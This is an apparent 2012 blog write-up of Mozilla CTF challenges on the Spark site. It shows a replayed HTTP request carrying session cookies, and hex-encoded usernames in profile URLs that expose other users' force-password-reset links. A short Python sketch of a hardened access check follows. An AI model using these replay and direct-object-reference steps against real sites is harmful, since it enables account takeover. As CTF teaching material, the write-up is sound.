Thursday, January 26, 2012

Mozilla CTF 2012 - 3 - Spark - Things long forgotten / 4 - Spark - Interesting Lineage / Kraken

This challenge was the first of 9 challenges based on the Spark site that Mozilla had up for a while. I figured that I would roll these two into one just to keep it simple, since they were pretty straightforward.


For the first one you needed to create an account on the Spark site. Once you did this, all that you needed to do was "boost your spark" by following the instructions, which took you from your location to the boost step and then directed you to the flag page.


Once you added this minus the quotes you snag some more points.

You can also boost your account from another registered account, capture your request, and keep resubmitting it to get your name on the board.

POST /en-US/m/boost2_confirm HTTP/1.1
Host: ocean.mozillactf.org
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://ocean.mozillactf.org/en-US/home
Content-Length: 77
Cookie: csrftoken=d0d01d47dc3e20835703eaf0c82d0a16; sessionid=a78c616fcd3d2889899098731f20ab9e; parent=qqcrew
DNT: 1
Pragma: no-cache
Cache-Control: no-cache

csrfmiddlewaretoken=d0d01d47dc3e20835703eaf0c82d0a16&no_parent=&parent=qqcrew






Next....

The next piece ties into "bringing down the Kraken", but I digress. If you continue to browse the Spark site you will eventually notice that your username is listed in the URLs as:

/en-US/users/717163726577
So what is the "717163726577" portion, you ask? Simple: it's just your HTML-encoded team name, with each character written as its two-digit hex ASCII value.

qqcrew = 717163726577

OK, so what? Well, if you happened to browse to the URL listed above, you would have gotten a page where you can reset your password, and that page contained the flag.

<div class="section">
 <div>DEBUG USER</div>
 <div>Name: <span>qqcrew</div>
 <div>Email: <span>qq@crew.com</div>
 <div>First Name :<span></div>
 <div>Last Name :<span></div>
 <div>City Name :<span>Cape Town</div>
 <div>Reset Email Password [Disabled]</div>
 <div>Force Password Reset <a href="https://ocean.mozillactf.org/pwreset/Nx0hBEhFUGMCARRcAhQhQxEXEk8XGh8ZAlEoChYAV0cNTx0QEBguQwEMEEYXTko=">[Enabled]</a></div>
</div>
<!-- Flag ='There are so many buried treasures in the sea!' -->

Bingo ! Another flag. 

So what else is there? Well, now you can mess with anyone that you want, which leads to bringing down the Kraken. So, taking what we know, we browse to:

/en-US/users/4B72616B656E

Then we do a force reset and Bingo another one drops!
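
The root cause in both flags above is that the profile URL carries only a reversible encoding of the username and the page is served to whoever asks. The sketch below is an added example, not code from the Spark site: the function names and the USERS records are hypothetical and constructed, and it puts the behaviour described here next to a handler that checks the session identity and leaves the reset link out of the response.

```python
import binascii

# Constructed sample records; the reset_link values are placeholders.
USERS = {
    "qqcrew": {"email": "qq@crew.com", "reset_link": "/pwreset/<token-a>"},
    "Kraken": {"email": "kraken@example.test", "reset_link": "/pwreset/<token-b>"},
}

def encode_id(username):
    """URL id scheme from the write-up: uppercase hex of the ASCII username."""
    return binascii.hexlify(username.encode("ascii")).decode("ascii").upper()

def decode_id(profile_id):
    """Invert the id; return None for malformed input instead of raising."""
    try:
        return binascii.unhexlify(profile_id).decode("ascii")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def view_profile_weak(session_user, profile_id):
    """Behaviour described above: the URL alone selects the debug view."""
    name = decode_id(profile_id)
    if name not in USERS:
        return 404, {}
    return 200, dict(USERS[name], name=name)

def view_profile_hardened(session_user, profile_id):
    """Same lookup, but the session identity decides access and the
    reset link is never rendered into the page."""
    name = decode_id(profile_id)
    if name not in USERS:
        return 404, {}
    if name != session_user:
        return 403, {}
    return 200, {"name": name, "email": USERS[name]["email"]}
```

An encoded identifier only names a record; the comparison against the authenticated session is what authorizes access to it.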

